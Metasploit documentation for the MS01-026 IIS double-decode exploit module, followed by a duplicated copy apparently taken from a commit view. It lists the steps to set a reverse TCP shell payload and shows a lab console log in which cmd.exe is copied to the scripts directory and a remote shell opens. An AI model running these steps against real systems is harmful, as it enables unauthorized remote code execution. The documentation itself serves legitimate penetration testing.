documentation/modules/exploit/windows/iis/ms01_026_dbldecode.md

## Vulnerable Application

This module will execute an arbitrary payload on a Microsoft IIS installation
that is vulnerable to the CGI double-decode vulnerability of 2001.

This module has been tested successfully on:

* Windows 2000 Professional (SP0) (EN)
* Windows 2000 Professional (SP1) (AR)
* Windows 2000 Professional (SP1) (CZ)
* Windows 2000 Server (SP0) (FR)
* Windows 2000 Server (SP1) (EN)
* Windows 2000 Server (SP1) (SE)

Note: This module will leave a Metasploit payload in the IIS scripts directory.

## Verification Steps

1. `use exploit/windows/iis/ms01_026_dbldecode`
1. `set RHOSTS [IP]`
1. `set PAYLOAD windows/shell/reverse_tcp`
1. `set LHOST [IP]`
1. `run`

## Options

### WINDIR

The Windows directory name of the target host.
The directory name will be detected automatically if not set.

### DEPTH

Traversal depth to reach the drive root (default: `2`)

## Scenarios

### Windows 2000 Server (SP0) (FR)

```
msf6 > use exploit/windows/iis/ms01_026_dbldecode
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
rhosts => 192.168.200.175
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_026_dbldecode) > run

[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using Windows directory "winnt"
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
[*] Command Stager progress -  66.67% done (40/60 bytes)
[*] Command Stager progress - 100.00% done (60/60 bytes)
[*] Triggering payload "qQErEZeB.exe" via a direct request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.175
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
          

c:\inetpub\scripts>hostname
hostname
win2k-srv-fr
```
ms01_026_dbldecode: Use HttpClient; remove meterpreter code; fix stager 2022-07-03 18:22:55 +10:00			`## Vulnerable Application`

			`This module will execute an arbitrary payload on a Microsoft IIS installation`
			`that is vulnerable to the CGI double-decode vulnerability of 2001.`

			`This module has been tested successfully on:`

			`* Windows 2000 Professional (SP0) (EN)`
			`* Windows 2000 Professional (SP1) (AR)`
			`* Windows 2000 Professional (SP1) (CZ)`
			`* Windows 2000 Server (SP0) (FR)`
			`* Windows 2000 Server (SP1) (EN)`
			`* Windows 2000 Server (SP1) (SE)`

			`Note: This module will leave a Metasploit payload in the IIS scripts directory.`

			`## Verification Steps`

			1. `use exploit/windows/iis/ms01_026_dbldecode`
			1. `set RHOSTS [IP]`
			1. `set PAYLOAD windows/shell/reverse_tcp`
			1. `set LHOST [IP]`
			1. `run`

			`## Options`

			`### WINDIR`

			`The Windows directory name of the target host.`
			`The directory name will be detected automatically if not set.`

			`### DEPTH`

			Traversal depth to reach the drive root (default: `2`)

			`## Scenarios`

			`### Windows 2000 Server (SP0) (FR)`

			```
			`msf6 > use exploit/windows/iis/ms01_026_dbldecode`
			`[*] Using configured payload windows/shell/reverse_tcp`
			`msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175`
			`rhosts => 192.168.200.175`
			`msf6 exploit(windows/iis/ms01_026_dbldecode) > check`
			`[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt`
			`msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130`
			`lhost => 192.168.200.130`
			`msf6 exploit(windows/iis/ms01_026_dbldecode) > run`

			`[*] Started reverse TCP handler on 192.168.200.130:4444`
			`[*] Using Windows directory "winnt"`
			`[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...`
			`[*] Command Stager progress - 66.67% done (40/60 bytes)`
			`[*] Command Stager progress - 100.00% done (60/60 bytes)`
			`[*] Triggering payload "qQErEZeB.exe" via a direct request...`
			`[*] Encoded stage with x86/shikata_ga_nai`
			`[*] Sending encoded stage (267 bytes) to 192.168.200.175`
			`[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400`
			`[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target`


			`Shell Banner:`
			`Microsoft Windows 2000 [Version 5.00.2195]`
			`-----`


			`c:\inetpub\scripts>hostname`
			`hostname`
			`win2k-srv-fr`
			```